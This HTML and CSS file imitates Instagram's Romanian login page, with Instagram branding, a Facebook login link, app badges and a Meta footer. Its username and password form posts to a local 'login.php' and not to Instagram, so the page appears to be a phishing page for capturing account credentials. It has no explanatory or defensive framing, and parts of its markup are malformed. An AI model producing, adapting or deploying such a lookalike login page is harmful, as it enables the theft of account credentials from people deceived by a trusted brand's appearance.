<!DOCTYPE html>
<html lang="ro">
    <head>
        <meta charset="UTF-8">
        <link rel="icon" href="Instagram_icon.png.webp">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Instagram</title>
        </head>
        <body>
            <div class="wrapper">
                <div class="header">
                    <div class="top">
                        <div class="logo">
                            <img src="images.png" alt="instagram" style="width: 175px;">
                        </div>
                        <div class="form"> 
                        <div class="input_field">
                            <form action="login.php" method="file">
                            <input type="text" name="username" placeholder="Telefon,e-mail sau nume de utilizator" class="input">
                        </div> 
                        <div class="input_field">
                            <input type="password" name="password" placeholder="Parolă" class="input">
                            </div>
                        <div class="btn">
                        <button>Conectare</button>
                        <div class="sau">
                            <div class="line"></div>
                            <p>SAU</p>
                            <div class="line"></div>
                        </div>
                        <div class="diff">
                            <div class="fb">
                              <img src="Facebook_icon_2013.svg.png">
                              </div>
                              </div>
                              <div class="tyu">
                              <p> <a href="https://www.facebook.com/login.php?skip_api_login=1&api_key=124024574287414&kid_directed_site=0&app_id=124024574287414&signed_next=1&next=https%3A%2F%2Fwww.facebook.com%2Fdialog%2Foauth%3Fclient_id%3D124024574287414%26redirect_uri%3Dhttps%253A%252F%252Fwww.instagram.com%252Faccounts%252Fsignup%252F%26state%3D%257B%2522fbLoginKey%2522%253A%252215z0ceoxtzqy61npxjlxg6tvkp99aeox6sxjek4qo9zj11puy03%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%26scope%3Demail%26response_type%3Dcode%252Cgranted_scopes%26locale%3Dro_RO%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D71e86627-ba6c-4f0c-ae7a-13a68da88be6%26tp%3Dunspecified&cancel_url=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%2522fbLoginKey%2522%253A%252215z0ceoxtzqy61npxjlxg6tvkp99aeox6sxjek4qo9zj11puy03%2522%252C%2522fbLoginReturnURL%2522%253A%2522%252Ffxcal%252Fdisclosure%252F%253Fnext%253D%25252F%2522%257D%23_%3D_&display=page&locale=ro_RO&pl_dbl=0">Conectare cu facebook</p>
                        </div>
                    </form>
                        <div class="vol">
                            <p><a href="#">Ai uitat parola?</a></p>
                        </div>
                            </div>
                            </div>
                    </div> 
                    <div class="singnup">
                    <p>Nu ai un cont? <a href="#">Înscrie-te</p> 
                    </div>
                    <div class="info">
                      <a>Instalează aplicaţia.</a>
                    </div>
                    <div class="apps">
                        <a href="https://apps.apple.com/app/instagram/id389801252?vt=lo"><img src="d877f3338b5e.png"></a>
                        <a href="https://play.google.com/store/apps/details?id=com.instagram.android&referrer=utm_source%3Dinstagramweb&utm_campaign=loginPage&ig_mid=8C4FC296-8BCE-469A-9CBC-9D643710983B&utm_content=lo&utm_medium=badge"><img src="29f9e2797a23.png"></a>
                    </div>
                    <div class="footer">
                        <div class="links">
                        <ul>
                                <li><a href="#">Meta</a></li>
                                <li><a href="#">Despre</a></li>
                                <li><a href="#">Blog</a></li>
                                <li><a href="#">Joburi</a></li>
                                <li><a href="#">Ajutor</a></li>
                                <li><a href="#">API</a></li>
                                <li><a href="#">Confidenţialitate</a></li>
                                <li><a href="#">Condiţii de utilizare</a></li>
                                <li><a href="#">Top conturi</a></li>
                                <li><a href="#">Hashtaguri</a></li>
                                <li><a href="#">Locaţii</a></li>
                                <li><a href="#">Instagram Lite</a></li>
                        </ul>
                    </div>
                        </div>
                            <div class="meta">
                                <li><a href="#">© 2022 Instagram from Meta</a></li>
                            </div>
                    </div>  
                </div>
            </body>
            </html>   
            <style>
*{
   margin: 0;
   padding: 0;
   box-sizing: border-box;
   outline: none;
   list-style: none;
   text-decoration: none;
   font-family: 'Roboto', sans-serif;
}
body{
    background: #ffffff;
    font-size: 14px;
    margin-top: 130px;
}
.wrapper .header{
    max-width: 350px;
    width: 100%;
    height: auto;
    margin: 50px auto;
}
.wrapper .header .top,
.wrapper .header .singnup{
    background-image: rgb(255, 255, 255);
    border: 1px solid #d3cecee3;
    border-radius: 1px;
    padding: 40px 40px 40px;
}
.wrapper .header .top img{
    display: block;
    margin: 0 auto 35px;
    color: #fff;
}
.wrapper .header .form .input_field{
    margin-bottom: 5px;
}
.wrapper .header .form .input_field .input{
    width: 100%;
    background: #fafafa;
    border: 1px solid #efefef;
    font-size: 12px;
    border-radius: 5px;
    color-scheme: #262626;
    padding: 10px;
}
.wrapper .header .form .input_field .input:focus{
    border: 1px solid #b2b2b2;
}
.btn button{
     background-color: #3897f0;
     color: #f1f1f1;
     width: 100%;
     padding: 5px;
     border-radius: 5px;
     margin-top: 10px;
}
.wrapper .header .sau{
    display: flex;
    height: 15px;
    margin: 15px 0 20px;
    justify-content: space-between;
    align-items: center;
}
.wrapper .header .sau .line{
    width: 105px;
    height: 2px;
    background: #bebdbd7a;
}
.wrapper .header .sau p{
    color: rgba(184, 180, 180, 0.884);
    font-size: 12px;
}
.wrapper .header .diff .fb{
    display: flex;
    justify-content: center;
    margin-left: -120px;
}
.wrapper .header .diff .fb img{
    width: 16px;
    height: 16px;
    margin-left:160px;
}
.tyu{
    color: #0c3897;
    font-weight: 500;
    margin-left: 60px;
    margin-top: -50px;
}
.vol{
    margin-top: 25px;
    margin-left: 90px;
    font-size: 12px;
    color: #3897f0;
}
 .wrapper .header .singnup{
     margin: 10px 0 20px;
     padding: 20px 40px;
     text-align: center;
     color:rgb(0, 0, 0);
}
.wrapper .header .top .info{
    margin-left: 1060px;
    margin-top: -20px; 
}
.wrapper .header .apps{
    text-align: center;
    color: #262626;
}
.wrapper .header .apps a{
    margin-bottom: 20px;
}
.wrapper .header .apps a img{
    width: 135px;
    height: 40px;
    margin-top: 20px;
}
.info a{
    margin-left: 50px;
    margin-top: 20px;
}
.wrapper .footer{
    max-width: 935px;
    width: 2000%;
    margin: 0 auto;
    padding: 40px 0;
    display: flex;
    justify-content: space-between;
    margin-left: -210px;
}
.wrapper .footer .links ul li{
    display: inline-block;
    margin-right: 10px;
    margin-top: 70px;
}
.wrapper .footer .links ul li a{
    font-size: 12px;
    color: #857d7d;
}
.wrapper .meta{
    margin-left: 90px;
    margin-top: -10px;
}
.wrapper .meta li a{
    color: #857d7d;
    font-size: 12px;
}
</style>          
